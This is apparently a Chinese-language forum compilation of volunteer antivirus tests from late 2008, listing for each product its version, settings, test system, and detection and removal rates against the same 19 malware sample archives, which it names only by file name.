其他: 手動掃描設定 : 偵測後、手動選擇刪除
防毒軟體顯示: 19/19
實際檔案數: 19
移除檔案數: 19
剩餘檔案數: 0
未偵測到: 0
偵測到但未移除: 0
偵測率: 19/19 = 100%
移除率: 19/19 = 100%
剩餘檔案:
無
偵測到但未移除檔案:
無
偵測到但只能隔離的檔案:
無
測試人員: JusticeH
回到第一頁
Avira Antivir Personal
版本:8.2.0.337
引擎:8.02.00.45
病毒碼:7.01.01.37
啟發式:全面關閉
測試環境:Windows Vista Home Premium SP1 x86
其他:使用手動掃描且自動處理,偵測到即修復,無法修復即刪除
防毒軟體顯示:20/25
實際檔案數:19
移除檔案數:19
剩餘檔案數:0
未偵測到:0
偵測率:19/19 = 100%
移除率:19/19 = 100%
剩餘檔案(壓縮檔內物件):
無偵測但未移除:
無
偵測並隔離
無
測試人員:megakotaro
回到第一頁
費爾托斯特 V7R3
版本:7.3.1.23211
引擎:8.02.00.45
病毒碼:9.20.32419
啟發式:預設啟發(大眾模式)
測試環境:Windows XP SP3 x86
其他:手動掃描 +手動刪除
防毒軟體顯示:8/19
實際檔案數:19
移除檔案數:8
剩餘檔案數:11
未偵測到:11
偵測率:8/19 = 42.1%
移除率:8/19 = 42.1%
剩餘檔案(壓縮檔內物件):
Backdoor2008.12.24@003.gz
Backdoor2008.12.24@003.zip
Trojan2008.12.24@001.gz
Trojan2008.12.24@003.zip
Trojan2008.12.24@005.zip
Trojan2008.12.24@008.gz
Trojan2008.12.24@009.zip
Virus2008.12.24@001.gz
Worm2008.12.24@001.gz
Worm2008.12.24@002.zip
Worm2008.12.24@003.gz
偵測但未移除:
無
偵測並隔離
無
測試人員:KINGYEH
回到第一頁
SearchGUI
防毒軟體版本:20080825
病毒碼日期:無
啟發式設定:預設啟發
測試環境:Windows XP SP3 x86
其他:手動掃描設定 : 無動作
防毒軟體顯示:17/19
實際檔案數:19
移除檔案數:0
剩餘檔案數:2
未偵測到:2
偵測到但未移除:17
偵測率:17/19 = 89.5%
移除率:0/19 = 0.0%
剩餘檔案:
Backdoor2008.12.24@003.zip
Trojan2008.12.24@009.zip
偵測到但未移除檔案:
Backdoor2008.12.24@001.zip
Backdoor2008.12.24@002.zip
Backdoor2008.12.24@003.gz
Backdoor2008.12.24@005.zip
Backdoor2008.12.24@006.zip
Worm2008.12.24@001.gz
Worm2008.12.24@002.zip
Worm2008.12.24@003.gz
Virus2008.12.24@001.gz
Trojan2008.12.24@001.gz
Trojan2008.12.24@002.zip
Trojan2008.12.24@003.zip
Trojan2008.12.24@004.zip
Trojan2008.12.24@005.zip
Trojan2008.12.24@006.zip
Trojan2008.12.24@007.rar
Trojan2008.12.24@008.gz
偵測到但只能隔離的檔案:
無
測試人員:asusp4b533
回到第一頁
Kaspersky Internet Security
防毒軟體版本:8.0.0.506
病毒碼日期:2008/12/25
啟發式設定:高啟發
測試環境:Windows Vista Ultimate SP1 x86
其他:無
防毒軟體顯示:19/ 58
實際檔案數:19
移除檔案數:19
剩餘檔案數:0
未偵測到:0
偵測到但未移除:0
偵測率:19/19 = 100 %
移除率:19/19 = 100 %
剩餘檔案:
無
偵測到但未移除檔案:
無
偵測到但只能隔離的檔案:
無
測試人員:Bug
回到第一頁
Dr.Web anti-virus
防毒軟體版本:4.44.5
病毒碼日期:2008/12/25
啟發式設定:預設啟發
測試環境:Windows XP SP2 x86
其他:手動掃描設定 : 偵測即刪除
防毒軟體顯示:13/44
實際檔案數:19
移除檔案數:13
剩餘檔案數:6
未偵測到:6
偵測到但未移除:0
偵測率:13/19 = 68.4%
移除率:13/19 = 68.4%
剩餘檔案:
Backdoor2008.12.24@006.zip
Trojan2008.12.24@003.zip
Trojan2008.12.24@004.zip
Trojan2008.12.24@005.zip
Trojan2008.12.24@009.zip
Worm2008.12.24@002.zip
偵測到但未移除檔案:
無
偵測到但只能隔離的檔案:
無
測試人員:haol
回到第一頁
Symantec Endpoint Security
防毒軟體版本:11.0.3001.2224
病毒碼日期:2008/12/25 r24
啟發式設定:高啟發
測試環境:Windows XP SP3 x86 (Virtual PC)
其他:無
防毒軟體顯示:15/38
實際檔案數:19
移除檔案數:15
剩餘檔案數:4
未偵測到:4
偵測到但未移除:0
偵測率:15/19 = 78.9%
移除率:15/19 = 78.9%
剩餘檔案:
Trojan2008.12.24@003.zip
Trojan2008.12.24@009.zip
Worm2008.12.24@001.gz
Worm2008.12.24@002.zip
偵測到但未移除檔案:
無
偵測到但只能隔離的檔案:
無
測試人員:imdino
回到第一頁
McAfee VirusScan Plus
防毒軟體版本:5300.2777
病毒碼日期:2008/12/25(DAT:5475)
測試環境:Windows XP SP3 x86
其他:
手動掃描設定 : 偵測即刪除
防毒軟體顯示:15/19
實際檔案數:19
移除檔案數:6
剩餘檔案數:13
未偵測到:4
偵測到但未移除:9
偵測率:15/19 = 78.9%
移除率:6/19 = 31.6%
剩餘檔案:
Backdoor2008.12.24@002.zip
Backdoor2008.12.24@003.zip
Backdoor2008.12.24@005.zip
Backdoor2008.12.24@006.zip
Trojan2008.12.24@002.zip
Trojan2008.12.24@003.zip
Trojan2008.12.24@004.zip
Trojan2008.12.24@005.zip
Trojan2008.12.24@006.zip
Trojan2008.12.24@009.zip
Worm2008.12.24@001.gz
Worm2008.12.24@002.zip
Backdoor2008.12.24@001.zip
偵測到但未移除檔案:
略
偵測到但只能隔離的檔案:
略
測試人員:integear
回到第一頁
TrendMicro OfficeScan
防毒軟體版本: 8.0
病毒碼日期:2008/12/25
5.731.00
啟發式設定: 無
防毒軟體顯示:19
實際檔案數:19
移除檔案數:19
剩餘檔案數:0
未偵測到:0
偵測到但未移除:0
偵測率:19/19 = 100%
移除率:19/19 = 100%
剩餘檔案:
無
偵測到但未移除檔案
無
測試人員: kennyg
回到第一頁
TrendMicro Internet Securit
防毒軟體版本: 17.0.1438
病毒碼日期:2008/12/25
5.732.60
啟發式設定: 無
防毒軟體顯示:19
實際檔案數:19
移除檔案數:19
剩餘檔案數:0
未偵測到:0
偵測到但未移除:0
偵測率:19/19 = 100%
移除率:19/19 = 100%
剩餘檔案:
無
偵測到但未移除檔案
無
測試人員: kennyg
回到第一頁
Kaspersky Anti-Virus
防毒軟體版本:7.0.1.325
病毒碼日期:27/12/2008
啟發式設定:預設啟發
測試環境:Windows Vista Basic SP1 x86
其他:威脅軟體類別全選
防毒軟體顯示:19/79
實際檔案數:19
移除檔案數:13
剩餘檔案數:6
未偵測到:0
偵測到但未移除:6
偵測率:19/19 = 100%
移除率:13/19 = 68.4%
剩餘檔案:
Backdoor2008.12.24@003.gz
Trojan2008.12.24@001.gz
Trojan2008.12.24@008.gz
Virus2008.12.24@001.gz
Worm2008.12.24@001.gz
Worm2008.12.24@003.gz
偵測到但未移除檔案:
Backdoor2008.12.24@003.gz
Trojan2008.12.24@001.gz
Trojan2008.12.24@008.gz
Virus2008.12.24@001.gz
Worm2008.12.24@001.gz
Worm2008.12.24@003.gz
測試人員:kitman231
回到第一頁
江民防毒 KV2008
掃描引擎版本: 11.00.800
病毒碼日期:2008/12/25
啟發式設定: 無
防毒軟體顯示:忘了看
實際檔案數:19
移除檔案數:19
剩餘檔案數:0
未偵測到:0
偵測到但未移除:0
偵測率:19/19 = 100%
移除率:19/19 = 100%
剩餘檔案:
無
偵測到但未移除檔案
無
測試人員: PHT
回到第一頁
Panda Internet Security
防毒軟體版本:2009 14.00.00
病毒碼日期:2008/12/26
啟發式設定:高啟發
測試環境:Windows Vista Ultimate SP1 x86
其他:手動掃描設定 : 偵測即刪除
防毒軟體顯示:18/19
實際檔案數:19(壓縮檔內物件)
移除檔案數:16(壓縮檔內物件)
剩餘檔案數:3(壓縮檔內物件)
啟發檔案數:1
未偵測到:0(壓縮檔內物件)
偵測到但未移除:3
偵測率:19/19 = 100%
移除率:16/19 = 84%
剩餘檔案:
Trojan2008.12.24@007
Trojan2008.12.24@009
Worm2008.12.24@002
偵測到但未移除檔案:
Trojan2008.12.24@007
Trojan2008.12.24@009
Worm2008.12.24@002
偵測到但只能隔離的檔案:
無
測試人員:Shisin
回到第一頁
ESET NOD32 Antivirus
防毒軟體版本:3.0.669.0
病毒碼版本:3718
病毒碼日期:2008/12/26
啟發式設定:進階
測試環境:Windows XP Professional SP3 x86 (VMware)
其他:手動掃描 預設設定值 偵測即刪除
防毒軟體顯示:18/43
實際檔案數:19
移除檔案數:18
剩餘檔案數:1
未偵測到:1
偵測到但未移除:0
偵測率:18/19 = 94.7%
移除率:18/19 = 94.7%
剩餘檔案:
Trojan2008.12.24@009.zip
偵測到但未移除檔案:
無
偵測到但只能隔離的檔案:
無
測試人員:小狄~
回到第一頁
Norton Internet Security
防毒軟體版本:2009 16.2.0.7
病毒碼日期:2008/12/28
測試環境:Windows 7 6956
其他:
防毒軟體顯示:39/15
實際檔案數:19
移除檔案數:15
剩餘檔案數:4
未偵測到:4
偵測到但未移除:4
偵測率:15/19 = 79%
移除率:15/19 = 79%
剩餘檔案:(請重新啟動完成.再看)
Trojan2008.12.24@003
Trojan2008.12.24@009
Worm2008.12.24@001
Worm2008.12.24@002
偵測到但未移除檔案(請重新啟動完成.再看)
無
偵測到但只能隔離的檔案:
無
測試人員:ss30102
回到第一頁
PC Tools Internet Security
防毒軟體版本:2009 6.0.0.386
病毒碼日期:2008/12/28
測試環境:Windows XP
其他:
防毒軟體顯示:19/14
實際檔案數:19
移除檔案數:14
剩餘檔案數:5
未偵測到:5
偵測到但未移除:5
偵測率:14/19 = 74%
移除率:14/19 = 74%
剩餘檔案:(請重新啟動完成.再看)
Backdoor2008.12.24@002.zip
Backdoor2008.12.24@003.zip
Backdoor2008.12.24@005.zip
Trojan2008.12.24@009.zip
Worm2008.12.24@002.zip
偵測到但未移除檔案(請重新啟動完成.再看)
無
偵測到但只能隔離的檔案:
無
測試人員:ss30102
回到第一頁
VBA32 Workerstation
防毒軟體版本: 3.12.8.10
病毒碼版本: 2008/12/21 08:09
啟發式設定: Excessive
測試環境: Windows XP SP2 in VMWare
其他:
Thorough scanning mode
Detect Spyware, Adware, Riskware
Detect installers of malware
Mail scanning
防毒軟體顯示: N/A
實際檔案數: 19
移除檔案數: 17 (16 個已知威脅 + 0 個已知廣告軟體 + 1 個未知威脅)
剩餘檔案數: 2
未偵測到: 2
偵測到但未移除: 0
偵測率: 17/19 = 89.47%
移除率: 17/19 = 89.47%
剩餘檔案:
Backdoor2008.12.24@003.gz
Trojan2008.12.24@009.zip
偵測到但未移除檔案:
N/A
測試人員: 000110
回到第一頁
VBA32 Workerstation
防毒軟體版本: 3.12.8.10
病毒碼版本: 2008/12/21 08:09
啟發式設定: 預設設定
測試環境: Windows XP SP2 in VMWare
其他: 右鍵掃瞄 (即預設設定)
防毒軟體顯示: N/A
實際檔案數: 19
移除檔案數: 15
剩餘檔案數: 4
未偵測到: 4
偵測到但未移除:
偵測率: 15/19 = 78.95%
移除率: 15/19 = 78.95%
剩餘檔案:
Backdoor2008.12.24@003.gz
Backdoor2008.12.24@005.zip
Trojan2008.12.24@007.rar
Trojan2008.12.24@009.zip
偵測到但未移除檔案:
N/A
測試人員: 000110
回到第一頁
avast! Antivirus
防毒軟體版本︰4.8.1296
病毒碼日期︰2008/12/28
測試環境︰Windows Vista Home Basic x86 (實機)
防毒軟體顯示:60/23
實際檔案數:19
移除檔案數:18
剩餘檔案數:1
未偵測到:1
偵測到但未移除:0
偵測率:18/19 = 95%
移除率:18/18 = 100%
剩餘檔案︰
Trojan2008.12.24@005.zip
測試人員︰戴計 Tai Kai
回到第一頁